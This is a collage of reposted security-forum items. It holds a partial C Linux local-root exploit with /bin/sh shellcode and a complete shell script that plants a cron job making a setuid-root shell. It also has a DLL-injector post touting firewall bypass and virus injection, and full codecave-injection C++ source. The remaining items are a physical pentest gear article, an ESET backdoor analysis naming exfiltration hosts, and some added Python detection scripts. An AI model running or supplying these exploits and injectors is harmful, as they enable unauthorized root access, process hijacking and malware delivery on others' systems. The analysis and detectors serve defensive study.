** if y0u dont have one, make big file (~100MB) in /tmp with dd
** and try to junk the cache e.g. cat /usr/lib/* >/dev/null
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/prctl.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <linux/a.out.h>
#include <asm/unistd.h>

static struct exec ex;
static char *e[256];
static char *a[4];
static char b[512];
static char t[256];
static volatile int *c;

/* h00lyshit shell code */
__asm__ (" __excode: call 1f \n"
         " 1: mov $23, %eax \n"
         " xor %ebx, %ebx \n"
         " int $0x80 \n"
         " pop %eax \n"
         " mov $cmd-1b, %ebx \n"
         " add %eax, %ebx \n"
         " mov $arg-1b, %ecx \n"
         " add %eax, %ecx \n"
         " mov %ebx, (%ecx) \n"
         " mov %ecx, %edx \n"
         " add $4, %edx \n"
         " mov $11, %eax \n"
         " int $0x80 \n"
         " mov $1, %eax \n"
         " int $0x80 \n"
         " arg: .quad 0x00, 0x00 \n"
         " cmd: .string \"/bin/sh\" \n"
         " __excode_e: nop \n"
         " .global __excode \n"
         " .global __excode_e \n");

extern void (*__excode) (void);
extern void (*__excode_e) (void);

void error (char *err)
{
  perror (err);
  fflush (stderr);
  exit (1);
}

/* exploit this shit */
void exploit (char *file)
{
  int i, fd;
  void *p;
  struct stat st;

  printf ("\ntrying to exploit %s\n\n", file);
  fflush (stdout);

  chmod ("/proc/self/environ", 04755);
  c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0);
  memset ((void *) c, 0, 4096);

  /* slow down machine */
  fd = open (file, O_RDONLY);
  fstat (fd, &st);
  p = (void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
  if (p == MAP_FAILED)
    error ("mmap");

  prctl (PR_SET_DUMPABLE, 0, 0, 0, 0);
  sprintf (t, "/proc/%d/environ", getpid ());
  sched_yield ();
  execve (NULL, a, e);
  madvise (0, 0, MADV_WILLNEED);

  i = fork ();
  /* give it a try */
  if (i)
    {
      (*c)++;
      !madvise (p, st.st_size, MADV_WILLNEED) ? : error ("madvise");
      prctl (PR_SET_DUMPABLE, 1, 0, 0, 0);
      sched_yield ();
    }
  else
    {
      nice(10);
      while (!(*c));
      sched_yield ();
      execve (t, a, e);
      error ("failed");
    }

  waitpid (i, NULL, 0);
  exit (0);
}

int main (int ac, char **av)
{
  int i, j, k, s;
  char *p;

  memset (e, 0, sizeof (e));
  memset (a, 0, sizeof (a));
  a[0] = strdup (av[0]);
  a[1] = strdup (av[0]);
  a[2] = strdup (av[1]);

  if (ac < 2)
    error ("usage: binary <big file name>");
  if (ac > 2)
    exploit (av[2]);

  printf ("\npreparing");
  fflush (stdout);

  /* make setuid a.out */
  memset (&ex, 0, sizeof (ex));
  N_SET_MAGIC (ex, NMAGIC);
  N_SET_MACHTYPE (ex, M_386);
  s = ((unsigned) &__excode_e) - (unsigned) &__excode;
  ex.a_text = s;
  ex.a_syms = -(s + sizeof (ex));
  memset (b, 0, sizeof (b));
  memcpy (b, &ex, sizeof (ex));
  memcpy (b + sizeof (ex), &__excode, s);

  /* make environment */
  p = b;
  s += sizeof (ex);
  j = 0;
  for (i = k = 0; i < s; i++)
    {
      if (!p[i])
        {
          e[j++] = &p[k];
          k = i + 1;
        }
    }

  /* reexec */
  getcwd (t, sizeof (t));
  strcat (t, "/");
  strcat (t, av[0]);
  execve (t, a, e);
  error ("execve");
  return 0;
}

Sursa: Local root exploits
-
Local root 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp

#!/bin/sh
#
# PRCTL local root exp By: Sunix
# + effected systems 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp
# tested on Intel(R) Xeon(TM) CPU 3.20GHz
# kernel 2.6.9-22.ELsmp
# maybe others ...
# Tx to drayer & RoMaNSoFt for their clear code...
#
# zmia23@yahoo.com

cat > /tmp/getsuid.c << __EOF__
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>

char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n";

int main() {
	int child;
	struct rlimit corelimit;
	corelimit.rlim_cur = RLIM_INFINITY;
	corelimit.rlim_max = RLIM_INFINITY;
	setrlimit(RLIMIT_CORE, &corelimit);

	if ( !( child = fork() )) {
		chdir("/etc/cron.d");
		prctl(PR_SET_DUMPABLE, 2);
		sleep(200);
		exit(1);
	}

	kill(child, SIGSEGV);

	sleep(120);
}
__EOF__

cat > /tmp/s.c << __EOF__
#include<stdio.h>
main(void) {
	setgid(0);
	setuid(0);
	system("/bin/sh");
	system("rm -rf /tmp/s");
	system("rm -rf /etc/cron.d/*");
	return 0;
}
__EOF__

echo "wait aprox 4 min to get sh"
cd /tmp
cc -o s s.c
cc -o getsuid getsuid.c
./getsuid
./s
rm -rf getsuid*
rm -rf s.c
rm -rf prctl.sh

Sursa: Local root exploits
-
Physical Penetration Testing Toolkit

Most penetration testing companies also provide physical penetration testing as part of their services. Some of them take this service more seriously than others, spending part of their budget on specialized costumes and equipment that can be used in physical penetration tests. In this article we will examine some of the equipment that is necessary to have if we are going to conduct a physical penetration test.

Get Out Of Jail Free Card

This is usually a signed letter from the client which states that the penetration tester is authorized to perform the test and that the client is aware of it. This letter will serve as proof in case things go bad and you get caught by security personnel or the police. The letter must therefore include the contact details of the people who are aware that a test is being performed (preferably people in higher-level positions), and they must be reachable during the test. This letter should never be forgotten by the penetration tester, and it is good practice to have at least 2 original copies in case one is lost accidentally or destroyed.

Get Out Of Jail Template

Cameras

Cameras are important equipment because you can take photos of client documents, facilities and the areas to which you have managed to gain access. These photos can be used as evidence in the penetration testing report afterwards. Of course mobile phone cameras can be used as well, but a proper digital camera with a large amount of memory is recommended.

Camera

Binoculars

Binoculars are useful in cases where you want to observe the security guards from a long distance or want to perform shoulder surfing attacks against your client's employees. For portability, and so as not to raise any alerts, it is advised to buy binoculars that fit into your pocket.

Portable Binoculars

Laptops

In a physical penetration test one might assume that a laptop is not needed because all you have to do is physically penetrate. Wrong! If you want to construct a scenario in which you disguise yourself as an employee of the company, a laptop is a critical component. Additionally, the client may require you to manage to attach to the internal network.

Laptop

GPS

A GPS device can help you in many ways. First of all, you can get an idea of the location that you are going to attack by observing satellite photos before the test. Alternatively you can use Google Maps for that, but the GPS has the advantage that you can carry it with you during the test and mark locations that you want to explore or avoid. It is also vital for your support team to know exactly where you are. Before you buy a GPS, make sure that the device can export the route that you took, in order to include it in the report.

GPS Device

Lock Picking Tools

Of course in a physical penetration test you don't expect every door to be open, so it is essential to also have a set of lock picking tools in your bag. Generally lock picking tools are not very expensive, so you will need to choose very carefully the best quality that suits your needs, as you don't want to break your client's locks.

Lock Picking Tools

Snap Lock Pick Gun

USB Sticks

There are scenarios where a physical penetration test might require you just to plant a USB stick containing malicious content inside the premises of the company. This will be the case when the client wants to test their employees' awareness of this type of attack. You can use the Social-Engineer Toolkit to create the malicious USB, or you can import your own files.

USB Sticks

Pwnie Express Tools

Pwnie Express is a company that specializes in constructing hardware tools that can be used in physical penetration testing engagements. Most of them are quite expensive, but the tools are highly effective because they look like normal devices, so when you plug them into the network it will be difficult for employees or administrators to discover them. Some of the devices that you can buy are the following: Pwn Plug Mini, Power Pwn and PwnPhone

Pwn Plug Mini

Power Pwn

Sursa: Physical Penetration Testing Toolkit
-
Aircrack-Ng Megaprimer Part 1: Airmon-Ng

Description: Part 1 in a series covering the tools in the aircrack-ng suite. Part 1 discusses airmon-ng.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:

Source: Aircrack-Ng Megaprimer Part 1: Airmon-Ng
-
Linux/SSHDoor.A Backdoored SSH daemon that steals passwords

by Sébastien Duquette, Malware Researcher

In his summary of New Year predictions by security researchers here at ESET, Stephen Cobb pointed to expanded efforts by malware authors to target the Linux operating system. Looks like that might be right: a blog post published by Sucuri yesterday describes a backdoored version of the SSH daemon discovered on compromised servers. Interestingly, this backdoor was used in conjunction with the malicious Apache module Linux/Chapro.A that we blogged about recently.

The Secure Shell Protocol (SSH) is a very popular protocol used for secure data communication. It is widely used in the Unix world to manage remote servers, transfer files, etc. The modified SSH daemon described here, Linux/SSHDoor.A, is designed to steal usernames and passwords and allows remote access to the server via either a hardcoded password or an SSH key.

The strings related to the hidden behaviors are XOR encoded. This is done to avoid easy identification by searching the binary for suspicious strings. We identified a total of 16 encoded strings. The figure below shows the part of the code responsible for decoding the hidden data by xoring it with the constant 0x23.

The HTTP protocol is used to send stolen data to a remote server. The information is first encrypted using a 1024-bit RSA key stored in the binary and then Base64 encoded. The data is sent via an HTTP POST request to the server used for data exfiltration.

The binary we analyzed contains two hostnames for servers used to collect data: openssh.info and linuxrepository.org. Both names were probably chosen to avoid raising suspicions from the administrators of the compromised servers. At this point in time, both hostnames point to a server hosted in Iceland with IP 82.221.99.69.

When the daemon is started, the backdoor sends the IP and port on which the service is running and the hostname of the server.

Whenever a user successfully logs onto the compromised server, the username and password are also sent to the remote server.

In addition to stealing credentials, the backdoor guarantees persistence on the compromised host for the attacker in two different ways. First, it has a hard-coded password inserted in the code. If any user logs in using this password, he is automatically granted access to the compromised server. The following figure shows the string comparison between the password provided by a user trying to log in and the hardcoded password.

Second, the modified binary also carries an SSH key. If a user logs into the server with the private key corresponding to the hard-coded public key, he is automatically granted access.

The backdoor can also retrieve configuration data from the file /var/run/.options. If this file exists, the backdoor will use the hostname, backdoor password and SSH key stored in it. The variables are stored one per line in cleartext.

As with Linux/Chapro.A, it is hard to tell how this Trojanized SSH daemon made its way onto a compromised server, but outdated applications or weak passwords are probably to blame.

Finding backdoored files can be problematic for most system administrators. We recommend regular use of integrity checking tools plus monitoring of outgoing network connections and regular scanning of all files by an antivirus product.

This threat is detected by ESET as Linux/SSHDoor.A.

Special thanks to Peter Kosinar, Pierre-Marc Bureau, and Olivier Bilodeau for their help.

Analyzed sample MD5 hash: 90dc9de5f93b8cc2d70a1be37acea23a

Source: Linux/SSHDoor.A Backdoored SSH daemon that steals passwords | ESET ThreatBlog
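The XOR-encoded strings and hard-coded hostnames described in the write-up above make a simple string-decoding check worthwhile when triaging an sshd binary. The following is an added example, not part of the ESET post: a small Python scanner that XORs a file image with the constant 0x23 the post names, collects printable runs the way `strings` would, and matches them against the indicators quoted in the post (openssh.info, linuxrepository.org, /var/run/.options). The blob it scans is constructed for the example, and `decoded_strings`, `find_indicators` and `build_sample` are names assumed here.

```python
import re
from typing import List

# Key named in the write-up: the hidden strings are XORed with 0x23.
XOR_KEY = 0x23

# Indicators quoted in the write-up: exfiltration hostnames and the config path.
KNOWN_INDICATORS = ("openssh.info", "linuxrepository.org", "/var/run/.options")


def xor_decode(data: bytes, key: int = XOR_KEY) -> bytes:
    """XOR every byte with a one-byte key; XOR is its own inverse."""
    return bytes(b ^ key for b in data)


def decoded_strings(blob: bytes, key: int = XOR_KEY, min_len: int = 6) -> List[str]:
    """Decode the whole image with `key` and return printable ASCII runs of at
    least `min_len` bytes, like running `strings` over the decoded bytes.
    Plaintext regions decode to junk, so callers should match the result
    against known indicators rather than eyeball every hit."""
    decoded = xor_decode(blob, key)
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(decoded)]


def find_indicators(blob: bytes, key: int = XOR_KEY) -> List[str]:
    """Return the known indicators that appear among the decoded strings,
    in order of first appearance."""
    hits: List[str] = []
    for s in decoded_strings(blob, key):
        for indicator in KNOWN_INDICATORS:
            if indicator in s and indicator not in hits:
                hits.append(indicator)
    return hits


def build_sample() -> bytes:
    """Constructed stand-in for a backdoored sshd image (not a real sample):
    ordinary plaintext strings plus a few XOR-encoded ones. The 0x23 padding
    decodes to NUL and so separates the hidden strings after decoding."""
    plain = b"OpenSSH_5.9p1 Debian-5ubuntu1\x00usage: sshd [-46DdeiqTt]\x00"
    hidden = [b"openssh.info", b"/var/run/.options", b"linuxrepository.org", b"POST /"]
    blob = plain
    for h in hidden:
        blob += b"\x23" * 8 + xor_decode(h) + b"\x23" * 8
    return blob


if __name__ == "__main__":
    sample = build_sample()
    for hit in find_indicators(sample):
        print("indicator found:", hit)
```

To run this against a real file, replace `build_sample()` with the bytes of the suspect daemon; because the key is only one byte, the same loop can be repeated for every key value 0x01 to 0xff when the constant is unknown, which is a cheap way to spot single-byte obfuscation in general.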
-
DLL injector that injects DLLs into Internet Explorer
Started By zwclose7, Dec 17 2012 01:14 PM

zwclose7

IE Injector (ieinj) allows you to inject any DLL into Internet Explorer (iexplore.exe). The process only serves as a host for the DLL and the original code of Internet Explorer is not executed.

Usage: ieinj [DLL path]

The steps of DLL injection:
1) Read the DLL path from the command line.
2) Search for the Internet Explorer executable file (iexplore.exe) in the Program Files folder.
3) Start Internet Explorer.
4) Write the DLL path into the target process's memory.
5) Create a remote thread to load the DLL.
6) The injected DLL will execute its code from the DllMain function.
7) Terminate the primary thread of Internet Explorer so the original code of IE is not executed.
8) The injected DLL can create a new thread to execute its code. The code will execute within Internet Explorer.

http://www.youtube.com/watch?v=dm0gGmjmKOc&feature=player_embedded

Note: Your DLL must have the DllMain function to execute code, or the process will exit after the injection.

This tool is useful for bypassing firewalls, since Internet Explorer is allowed to access the network by most firewalls. This tool is also useful for injecting virus DLLs into Internet Explorer.

The file dll.dll is an example DLL to test the injector. The DLL will display a message box when it is loaded into a process.

Download here http://www.rohitab.com/discuss/index.php?app=core&module=attach&section=attach&attach_id=3745

Source: DLL injector that inject DLL into Internet Explorer - rohitab.com - Forums
-
My codecave injector
Started By zwclose7, Yesterday, 04:57 AM

zwclose7

This is my first codecave injector. It injects a codecave into another process. The injected codecave will play a beep sound, and then display a message box.

#include <iostream>
#include <cstring>
#include <Windows.h>
using namespace std;

// Function pointer types for the two APIs the injected code calls.
typedef BOOL (WINAPI *fnBeep)(DWORD,DWORD);
typedef int (WINAPI *fnMessageBoxA)(HWND,LPCSTR,LPCSTR,UINT);

// Data block copied into the target process next to the code.
// Addresses are stored as DWORD, so this build is 32-bit only.
struct PARAMETERS{
    DWORD BEEP;
    DWORD MSGBOX;
    DWORD freq;
    DWORD time;
    HWND hWnd;
    char text[60];
    char title[60];
    UINT type;
};

// The codecave itself. It must be position independent (no calls into this
// module, no globals, no string literals), which is why every address it
// needs arrives through PARAMETERS. WINAPI matches the calling convention
// expected for an LPTHREAD_START_ROUTINE.
static DWORD WINAPI ThreadProc(PARAMETERS * data){
    fnBeep beep=(fnBeep)data->BEEP;
    fnMessageBoxA msgbox=(fnMessageBoxA)data->MSGBOX;
    beep(data->freq,data->time);
    msgbox(data->hWnd,data->text,data->title,data->type);
    return 0;
}

// Placed directly after ThreadProc so that its address marks the end of the
// codecave. This relies on the compiler laying the functions out in order
// (release build, no incremental linking, ThreadProc not inlined).
static DWORD Useless(){
    return 0;
}

int main(){
    DWORD PID;
    DWORD TID;
    DWORD exts;
    HANDLE hToken;
    LUID luid;

    // Enable SeDebugPrivilege so processes of other users can be opened.
    LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&luid);
    TOKEN_PRIVILEGES tp;
    tp.Privileges[0].Luid=luid;
    tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
    tp.PrivilegeCount=1;
    OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hToken);
    AdjustTokenPrivileges(hToken,false,&tp,sizeof(tp),NULL,NULL);
    CloseHandle(hToken);

    PARAMETERS data;
    data.freq=1000;
    data.time=1000;
    data.hWnd=NULL;
    strcpy(data.text,"Hello world");
    strcpy(data.title,"Codecave");
    data.type=MB_ICONINFORMATION;

    // kernel32 and user32 are mapped at the same base in every process on the
    // running system (ASLR re-randomizes them per boot, not per process), so
    // addresses resolved here are valid inside the target too. LoadLibraryA is
    // used explicitly so the narrow string literals compile with UNICODE set.
    HMODULE k32=LoadLibraryA("kernel32.dll");
    HMODULE u32=LoadLibraryA("user32.dll");
    data.BEEP=(DWORD)GetProcAddress(k32,"Beep");
    data.MSGBOX=(DWORD)GetProcAddress(u32,"MessageBoxA");
    DWORD SizeofProc=(LPBYTE)Useless-(LPBYTE)ThreadProc;

    cout <<"Enter PID: ";
    cin >>PID;
    HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,false,PID);
    if(hProcess==NULL){
        cout <<"\nUnable to open process handle.\n\n";
        return 1;
    }
    cout <<"\nProcess handle opened.\n\n";

    cout <<"Allocating memory for thread data.\n\n";
    LPVOID pData=VirtualAllocEx(hProcess,NULL,sizeof(data),MEM_COMMIT,PAGE_READWRITE);
    if(pData==NULL){
        cout <<"Unable to allocate memory for thread data.\n\n";
        CloseHandle(hProcess);
        return 1;
    }

    cout <<"Allocating memory for thread code.\n\n";
    LPVOID code=VirtualAllocEx(hProcess,NULL,SizeofProc,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
    if(code==NULL){
        cout <<"Unable to allocate memory for thread code.\n\n";
        CloseHandle(hProcess);
        return 1;
    }

    cout <<"Writing thread data to target process.\n\n";
    if(!WriteProcessMemory(hProcess,pData,&data,sizeof(data),NULL)){
        cout <<"Unable to write thread data to target process.\n\n";
        CloseHandle(hProcess);
        return 1;
    }

    cout <<"Writing thread code to target process.\n\n";
    if(!WriteProcessMemory(hProcess,code,(void*)ThreadProc,SizeofProc,NULL)){
        cout <<"Unable to write thread code to target process.\n\n";
        CloseHandle(hProcess);
        return 1;
    }

    cout <<"Data address: "<<pData<<"\n\n";
    cout <<"Code address: "<<code<<"\n\n";

    cout <<"Creating remote thread within target process.\n\n";
    HANDLE hThread=CreateRemoteThread(hProcess,NULL,0,(LPTHREAD_START_ROUTINE)code,pData,0,&TID);
    if(hThread==NULL){
        cout <<"Unable to create remote thread within target process.\n\n";
        CloseHandle(hProcess);
        return 1;
    }
    cout <<"Thread created. Thread ID: "<<TID<<"\n\n";

    cout <<"Waiting for the thread to terminate.\n\n";
    WaitForSingleObject(hThread,INFINITE);
    GetExitCodeThread(hThread,&exts);
    cout <<"Thread terminated with status code "<<exts<<".\n\n";

    cout <<"Closing thread handle.\n\n";
    CloseHandle(hThread);
    cout <<"Closing process handle.\n\n";
    CloseHandle(hProcess);
    return 0;
}

Source: My codecave injector - rohitab.com - Forums
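Both the ieinj post and the codecave injector above rely on the same primitives: VirtualAllocEx, WriteProcessMemory and CreateRemoteThread against another process. From the defender's side, that is exactly what Sysmon Event ID 8 (CreateRemoteThread) records, with the source and target image, the thread's start address and the module and export that address resolves to. The following is an added example, not part of either post: detection logic in Python over constructed records shaped like that event's fields (SourceImage, TargetImage, StartModule, StartFunction). A remote thread whose start function is a LoadLibrary variant matches the DLL-injection pattern of the first post, and one whose start address is backed by no loaded module matches the codecave pattern of the second. The pipe-separated record layout and every path are constructed for the example; `parse_event`, `classify` and `detect` are names assumed here.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed records carrying the Sysmon Event ID 8 (CreateRemoteThread)
# fields this check needs. The 'Key=Value|Key=Value' layout and every path
# below are invented for the example; a real pipeline would read the XML/JSON
# event. Sysmon writes "-" when a field cannot be resolved.
SAMPLE_EVENTS = [
    # DLL injection pattern: the thread starts at kernel32!LoadLibraryA in iexplore.exe
    "SourceImage=C:\\Users\\lab\\ieinj.exe|TargetImage=C:\\Program Files\\Internet Explorer\\iexplore.exe"
    "|StartModule=C:\\Windows\\System32\\KERNEL32.DLL|StartFunction=LoadLibraryA",
    # Codecave pattern: the thread starts in memory that belongs to no loaded module
    "SourceImage=C:\\Users\\lab\\codecave.exe|TargetImage=C:\\Windows\\System32\\notepad.exe"
    "|StartModule=-|StartFunction=-",
    # Benign: csrss delivers console control events by starting CtrlRoutine in the console process
    "SourceImage=C:\\Windows\\System32\\csrss.exe|TargetImage=C:\\Windows\\System32\\cmd.exe"
    "|StartModule=C:\\Windows\\System32\\KERNEL32.DLL|StartFunction=CtrlRoutine",
    # Benign: a multi-process application creating threads in a sibling process of the same image
    "SourceImage=C:\\Program Files\\Browser\\browser.exe|TargetImage=C:\\Program Files\\Browser\\browser.exe"
    "|StartModule=C:\\Program Files\\Browser\\browser.dll|StartFunction=-",
]

# Thread entry points that mean "the thread's only job is to map a DLL".
LOADER_FUNCTIONS = {"loadlibrarya", "loadlibraryw", "loadlibraryexa", "loadlibraryexw"}


@dataclass
class RemoteThreadEvent:
    source_image: str
    target_image: str
    start_module: str    # "" when the start address maps to no loaded module
    start_function: str  # "" when no exported symbol matches the start address


def parse_event(line: str) -> RemoteThreadEvent:
    """Split one constructed 'Key=Value|Key=Value' record into an event."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()

    def clean(name: str) -> str:
        value = fields.get(name, "")
        return "" if value == "-" else value

    return RemoteThreadEvent(clean("SourceImage"), clean("TargetImage"),
                             clean("StartModule"), clean("StartFunction"))


def classify(ev: RemoteThreadEvent) -> Optional[str]:
    """Return a verdict for one event, or None when it matches neither pattern."""
    # Threads between two processes of the same image are routine for
    # multi-process applications; suppress them to keep the signal clean.
    if ev.source_image.lower() == ev.target_image.lower():
        return None
    # Pattern from the ieinj post: the entry point is the loader itself, so the
    # remote thread exists only to pull a DLL into the target.
    if ev.start_function.lower() in LOADER_FUNCTIONS:
        return "dll-injection"
    # Pattern from the codecave post: the entry point lies in memory that
    # VirtualAllocEx created, which no loaded module backs.
    if not ev.start_module:
        return "code-cave"
    return None


def detect(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Run both checks over a batch of records; return (verdict, source, target)."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        verdict = classify(ev)
        if verdict is not None:
            findings.append((verdict, ev.source_image, ev.target_image))
    return findings


if __name__ == "__main__":
    for verdict, src, dst in detect(SAMPLE_EVENTS):
        print(f"{verdict}: {src} -> {dst}")
```

The same-image suppression is a noise filter, not a safety guarantee: an injector that names its binary after its target would slip past it, so in production the rule is better paired with a path allow-list for the source image. Note also that the ieinj post starts iexplore.exe itself before injecting, so the parent-child relationship (a process-create event) is a second, independent signal for that case.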